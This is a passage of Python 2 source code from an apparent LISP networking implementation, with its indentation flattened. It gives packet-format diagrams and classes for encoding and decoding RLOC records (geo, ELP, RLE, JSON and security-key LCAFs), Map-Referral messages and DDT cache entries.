packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is the structure of an RLOC record in a Map-Request, Map-Reply, and
# Map-Register's EID record.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# /| Priority | Weight | M Priority | M Weight |
# L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# o | Unused Flags |L|p|R| Loc-AFI |
# c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \| Locator |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# AFI-List LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 1 | Rsvd2 | 2 + 4 + 2 + 16 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 1 | IPv4 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv4 Address | AFI = 2 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Geo Coordinate LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 5 | Rsvd2 | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |U|N|E|A|M|R|K| Reserved | Location Uncertainty |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Lat Degrees | Latitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Long Degrees | Longitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Altitude |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Radius | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Explicit Locator Path (ELP) Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 10 | Rsvd2 | n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop k ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Replication List Entry Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 13 | Rsvd2 | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #1 RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #n RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Security Key Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 11 | Rsvd2 | 6 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Count | Rsvd3 |A| Cipher Suite| Rsvd4 |R|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Length | Public Key Material ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... Public Key Material |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Locator Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# JSON Data Model Type Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 14 | kid | Rvd2|E|B| Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | JSON length | JSON binary/text encoding ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Optional Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When the E-bit is set to 1, the 'kid' field is a key-id indicating that the
# value fields in the JSON string are encrypted with the encryption key
# associated with that key-id.
#
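#
# For example (hypothetical key-id), with the E-bit set and a kid of 3, the
# byte carrying kid/E/B in lisp_rloc_record.encode_json() below is
# (3 << 5) | 0x02 = 0x62.
#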
class lisp_rloc_record():
def __init__(self):
self.priority = 0
self.weight = 0
self.mpriority = 0
self.mweight = 0
self.local_bit = False
self.probe_bit = False
self.reach_bit = False
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.rloc_name = None
self.keys = None
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def print_record(self, indent):
rloc_str = self.print_rloc_name()
if (rloc_str != ""): rloc_str = ", " + rloc_str
geo_str = ""
if (self.geo):
name = ""
if (self.geo.geo_name): name = "'{}' ".format(self.geo.geo_name)
geo_str = ", geo: {}{}".format(name, self.geo.print_geo())
#endif
elp_str = ""
if (self.elp):
name = ""
if (self.elp.elp_name): name = "'{}' ".format(self.elp.elp_name)
elp_str = ", elp: {}{}".format(name, self.elp.print_elp(True))
#endif
rle_str = ""
if (self.rle):
name = ""
if (self.rle.rle_name): name = "'{}' ".format(self.rle.rle_name)
rle_str = ", rle: {}{}".format(name, self.rle.print_rle(False,
True))
#endif
json_str = ""
if (self.json):
name = ""
if (self.json.json_name):
name = "'{}' ".format(self.json.json_name)
#endif
json_str = ", json: {}".format(self.json.print_json(False))
#endif
sec_str = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
sec_str = ", " + self.keys[1].print_keys()
#endif
line = ("{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}")
lprint(line.format(indent, self.print_flags(), self.priority,
self.weight, self.mpriority, self.mweight, self.rloc.afi,
red(self.rloc.print_address_no_iid(), False), rloc_str, geo_str,
elp_str, rle_str, json_str, sec_str))
#enddef
def print_flags(self):
return("{}{}{}".format("L" if self.local_bit else "l", "P" \
if self.probe_bit else "p", "R" if self.reach_bit else "r"))
#enddef
def store_rloc_entry(self, rloc_entry):
rloc = rloc_entry.rloc if (rloc_entry.translated_rloc.is_null()) \
else rloc_entry.translated_rloc
self.rloc.copy_address(rloc)
if (rloc_entry.rloc_name):
self.rloc_name = rloc_entry.rloc_name
#endif
if (rloc_entry.geo):
self.geo = rloc_entry.geo
else:
name = rloc_entry.geo_name
if (name and lisp_geo_list.has_key(name)):
self.geo = lisp_geo_list[name]
#endif
#endif
if (rloc_entry.elp):
self.elp = rloc_entry.elp
else:
name = rloc_entry.elp_name
if (name and lisp_elp_list.has_key(name)):
self.elp = lisp_elp_list[name]
#endif
#endif
if (rloc_entry.rle):
self.rle = rloc_entry.rle
else:
name = rloc_entry.rle_name
if (name and lisp_rle_list.has_key(name)):
self.rle = lisp_rle_list[name]
#endif
#endif
if (rloc_entry.json):
self.json = rloc_entry.json
else:
name = rloc_entry.json_name
if (name and lisp_json_list.has_key(name)):
self.json = lisp_json_list[name]
#endif
#endif
self.priority = rloc_entry.priority
self.weight = rloc_entry.weight
self.mpriority = rloc_entry.mpriority
self.mweight = rloc_entry.mweight
#enddef
def encode_json(self, lisp_json):
json_string = lisp_json.json_string
kid = 0
if (lisp_json.json_encrypted):
kid = (lisp_json.json_key_id << 5) | 0x02
#endif
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
addr_len = self.rloc.addr_length() + 2
lcaf_len = socket.htons(len(json_string) + addr_len)
json_len = socket.htons(len(json_string))
packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, kid,
lcaf_len, json_len)
packet += json_string
#
# If telemetry, store RLOC address in LCAF.
#
if (lisp_is_json_telemetry(json_string)):
packet += struct.pack("H", socket.htons(self.rloc.afi))
packet += self.rloc.pack_address()
else:
packet += struct.pack("H", 0)
#endif
return(packet)
#enddef
def encode_lcaf(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
gpkt = ""
if (self.geo):
gpkt = self.geo.encode_geo()
#endif
epkt = ""
if (self.elp):
elp_recs = ""
for elp_node in self.elp.elp_nodes:
afi = socket.htons(elp_node.address.afi)
flags = 0
if (elp_node.eid): flags |= 0x4
if (elp_node.probe): flags |= 0x2
if (elp_node.strict): flags |= 0x1
flags = socket.htons(flags)
elp_recs += struct.pack("HH", flags, afi)
elp_recs += elp_node.address.pack_address()
#endfor
elp_len = socket.htons(len(elp_recs))
epkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_ELP_TYPE,
0, elp_len)
epkt += elp_recs
#endif
rpkt = ""
if (self.rle):
rle_recs = ""
for rle_node in self.rle.rle_nodes:
afi = socket.htons(rle_node.address.afi)
rle_recs += struct.pack("HBBH", 0, 0, rle_node.level, afi)
rle_recs += rle_node.address.pack_address()
if (rle_node.rloc_name):
rle_recs += struct.pack("H", socket.htons(LISP_AFI_NAME))
rle_recs += rle_node.rloc_name + "\0"
#endif
#endfor
rle_len = socket.htons(len(rle_recs))
rpkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_RLE_TYPE,
0, rle_len)
rpkt += rle_recs
#endif
jpkt = ""
if (self.json):
jpkt = self.encode_json(self.json)
#endif
spkt = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
spkt = self.keys[1].encode_lcaf(self.rloc)
#endif
npkt = ""
if (self.rloc_name):
npkt += struct.pack("H", socket.htons(LISP_AFI_NAME))
npkt += self.rloc_name + "\0"
#endif
apkt_len = len(gpkt) + len(epkt) + len(rpkt) + len(spkt) + 2 + \
len(jpkt) + self.rloc.addr_length() + len(npkt)
apkt_len = socket.htons(apkt_len)
apkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_AFI_LIST_TYPE,
0, apkt_len, socket.htons(self.rloc.afi))
apkt += self.rloc.pack_address()
return(apkt + npkt + gpkt + epkt + rpkt + spkt + jpkt)
#enddef
def encode(self):
flags = 0
if (self.local_bit): flags |= 0x0004
if (self.probe_bit): flags |= 0x0002
if (self.reach_bit): flags |= 0x0001
packet = struct.pack("BBBBHH", self.priority, self.weight,
self.mpriority, self.mweight, socket.htons(flags),
socket.htons(self.rloc.afi))
if (self.geo or self.elp or self.rle or self.keys or self.rloc_name \
or self.json):
packet = packet[0:-2] + self.encode_lcaf()
else:
packet += self.rloc.pack_address()
#endif
return(packet)
#enddef
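    #
    # Note: encode() above overwrites the 2-byte AFI it just packed
    # ("packet[0:-2]") with the LCAF encoding whenever the RLOC carries
    # geo/ELP/RLE/JSON/security/name information, since encode_lcaf()
    # supplies its own AFI of 16387 (LISP_AFI_LCAF).
    #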
def decode_lcaf(self, packet, nonce, ms_json_encrypt):
packet_format = "HBBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
#
# Process AFI-List LCAF.
#
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE):
while (lcaf_len > 0):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
packet_len = len(packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF):
packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
if (packet == None): return(None)
else:
packet = packet[format_size::]
self.rloc_name = None
if (afi == LISP_AFI_NAME):
packet, rloc_name = lisp_decode_dist_name(packet)
self.rloc_name = rloc_name
else:
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
#endif
lcaf_len -= packet_len - len(packet)
#endwhile
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
#
# Process Geo-Coordinate LCAF.
#
geo = lisp_geo("")
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
if (packet == None): return(None)
self.geo = geo
elif (lcaf_type == LISP_LCAF_JSON_TYPE):
encrypted_json = rsvd2 & 0x02
#
# Process JSON LCAF.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
json_len = struct.unpack(packet_format, packet[:format_size])[0]
json_len = socket.ntohs(json_len)
if (lcaf_len < format_size + json_len): return(None)
packet = packet[format_size::]
self.json = lisp_json("", packet[0:json_len], encrypted_json,
ms_json_encrypt)
packet = packet[json_len::]
#
# If telemetry, store RLOC address in LCAF.
#
afi = socket.ntohs(struct.unpack("H", packet[:2])[0])
packet = packet[2::]
if (afi != 0 and lisp_is_json_telemetry(self.json.json_string)):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
#endif
elif (lcaf_type == LISP_LCAF_ELP_TYPE):
#
# Process ELP LCAF.
#
elp = lisp_elp(None)
elp.elp_nodes = []
while (lcaf_len > 0):
flags, afi = struct.unpack("HH", packet[:4])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
elp_node = lisp_elp_node()
elp.elp_nodes.append(elp_node)
flags = socket.ntohs(flags)
elp_node.eid = (flags & 0x4)
elp_node.probe = (flags & 0x2)
elp_node.strict = (flags & 0x1)
elp_node.address.afi = afi
elp_node.address.mask_len = elp_node.address.host_mask_len()
packet = elp_node.address.unpack_address(packet[4::])
lcaf_len -= elp_node.address.addr_length() + 4
#endwhile
elp.select_elp_node()
self.elp = elp
elif (lcaf_type == LISP_LCAF_RLE_TYPE):
#
# Process RLE LCAF.
#
rle = lisp_rle(None)
rle.rle_nodes = []
while (lcaf_len > 0):
x, y, level, afi = struct.unpack("HBBH", packet[:6])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
rle_node = lisp_rle_node()
rle.rle_nodes.append(rle_node)
rle_node.level = level
rle_node.address.afi = afi
rle_node.address.mask_len = rle_node.address.host_mask_len()
packet = rle_node.address.unpack_address(packet[6::])
lcaf_len -= rle_node.address.addr_length() + 6
if (lcaf_len >= 2):
afi = struct.unpack("H", packet[:2])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[2::]
packet, rle_node.rloc_name = \
lisp_decode_dist_name(packet)
if (packet == None): return(None)
lcaf_len -= len(rle_node.rloc_name) + 1 + 2
#endif
#endif
#endwhile
self.rle = rle
self.rle.build_forwarding_list()
elif (lcaf_type == LISP_LCAF_SECURITY_TYPE):
#
# Get lisp_key() data structure so we can parse keys in the Map-
# Reply RLOC-record. Then get the RLOC address.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, lcaf_len, False)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, lcaf_len, False)
if (packet == None): return(None)
if (len(packet) < 2): return(None)
afi = struct.unpack("H", packet[:2])[0]
self.rloc.afi = socket.ntohs(afi)
if (len(packet) < self.rloc.addr_length()): return(None)
packet = self.rloc.unpack_address(packet[2::])
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#
# Some RLOC records may not have RLOC addresses but other LCAF
# types. Don't process security keys because we need RLOC addresses
# to index into security data structures.
#
if (self.rloc.is_null()): return(packet)
rloc_name_str = self.rloc_name
if (rloc_name_str): rloc_name_str = blue(self.rloc_name, False)
#
# If we found no stored key, store the newly created lisp_keys()
# to the RLOC list if and only if a remote public-key was supplied
# in the Map-Reply.
#
stored_key = self.keys[1] if self.keys else None
if (stored_key == None):
if (key.remote_public_key == None):
string = bold("No remote encap-public-key supplied", False)
lprint(" {} for {}".format(string, rloc_name_str))
key = None
else:
string = bold("New encap-keying with new state", False)
lprint(" {} for {}".format(string, rloc_name_str))
key.compute_shared_key("encap")
#endif
#endif
#
# If we have stored-key, the other side received the local public
# key that is stored in variable 'stored_key'. If the remote side
# did not supply a public-key, it doesn't want to do lisp-crypto.
# If it did supply a public key, check to see if the same as
# last time, and if so, do nothing, else we do a rekeying.
#
if (stored_key):
if (key.remote_public_key == None):
key = None
remote = bold("Remote encap-unkeying occurred", False)
lprint(" {} for {}".format(remote, rloc_name_str))
elif (stored_key.compare_keys(key)):
key = stored_key
lprint(" Maintain stored encap-keys for {}".format( \
rloc_name_str))
else:
if (stored_key.remote_public_key == None):
string = "New encap-keying for existing state"
else:
string = "Remote encap-rekeying"
#endif
lprint(" {} for {}".format(bold(string, False),
rloc_name_str))
stored_key.remote_public_key = key.remote_public_key
stored_key.compute_shared_key("encap")
key = stored_key
#endif
#endif
self.keys = [None, key, None, None]
else:
#
# All other LCAFs we skip over and ignore.
#
packet = packet[lcaf_len::]
#endif
return(packet)
#enddef
def decode(self, packet, nonce, ms_json_encrypt=False):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.priority, self.weight, self.mpriority, self.mweight, flags, \
afi = struct.unpack(packet_format, packet[:format_size])
flags = socket.ntohs(flags)
afi = socket.ntohs(afi)
self.local_bit = True if (flags & 0x0004) else False
self.probe_bit = True if (flags & 0x0002) else False
self.reach_bit = True if (flags & 0x0001) else False
if (afi == LISP_AFI_LCAF):
packet = packet[format_size-2::]
packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
else:
self.rloc.afi = afi
packet = packet[format_size::]
packet = self.rloc.unpack_address(packet)
#endif
self.rloc.mask_len = self.rloc.host_mask_len()
return(packet)
#enddef
def end_of_rlocs(self, packet, rloc_count):
for i in range(rloc_count):
packet = self.decode(packet, None, False)
if (packet == None): return(None)
#endfor
return(packet)
#enddef
#endclass
#
# Map-Referral Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=6 | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Referral Count| EID mask-len | ACT |A|I| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c |SigCnt | Map Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix ... |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |R| Loc/LCAF-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator ... |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_referral():
def __init__(self):
self.record_count = 0
self.nonce = 0
#enddef
def print_map_referral(self):
lprint("{} -> record-count: {}, nonce: 0x{}".format( \
bold("Map-Referral", False), self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REFERRAL << 28) | self.record_count
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is a DDT cache type data structure that holds information configured
# in the "lisp ddt-authoritative-prefix" and "lisp delegate" commands. The
# self.delegation_set[] is a list of lisp_ddt_node()s.
#
class lisp_ddt_entry():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.delegation_set = []
self.source_cache = None
self.map_referrals_sent = 0
#enddef
def is_auth_prefix(self):
if (len(self.delegation_set) != 0): return(False)
if (self.is_star_g()): return(False)
return(True)
#enddef
def is_ms_peer_entry(self):
if (len(self.delegation_set) == 0): return(False)
return(self.delegation_set[0].is_ms_peer())
#enddef
def print_referral_type(self):
if (len(self.delegation_set) == 0): return("unknown")
ddt_node = self.delegation_set[0]
return(ddt_node.print_node_type())
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_ddt_cache.add_cache(self.eid, self)
else:
ddt = lisp_ddt_cache.lookup_cache(self.group, True)
if (ddt == None):
ddt = lisp_ddt_entry()
ddt.eid.copy_address(self.group)
ddt.group.copy_address(self.group)
lisp_ddt_cache.add_cache(self.group, ddt)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ddt.group)
ddt.add_source_entry(self)
#endif
#enddef
def add_source_entry(self, source_ddt):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ddt.eid, source_ddt)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
#endclass
class lisp_ddt_node():
def __init__(self):
self.delegate_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.map_server_peer = False
self.map_server_child = False
self.priority = 0
self.weight = 0
#enddef
def print_node_type(self):
if (self.is_ddt_child()): return("ddt-child")
if (self.is_ms_child()): return("map-server-child")
if (self.is_ms_peer()): return("map-server-peer")
#enddef
def is_ddt_child(self):
if (self.map_server_child): return(False)
if (self.map_server_peer): return(False)
return(True)
#enddef
def is_ms_child(self):
return(self.map_server_child)
#enddef
def is_ms_peer(self):
return(self.map_server_peer)
#enddef
#endclass
#
# This is a Map-Request queue used on a Map-Resolver when waiting for a
# Map-Referral to be returned by a DDT-node or a Map-Server.
#
class lisp_ddt_map_request():
def __init__(self, lisp_sockets, packet, eid, group, nonce):
self.uptime = lisp_get_timestamp()
self.lisp_sockets = lisp_sockets
self.packet = packet
self.eid = eid
self.group = group
self.nonce = nonce
self.mr_source = None
self.sport = 0
self.itr = None
self.retry_count = 0
self.send_count = 0
self.retransmit_timer = None
self.last_request_sent_to = None
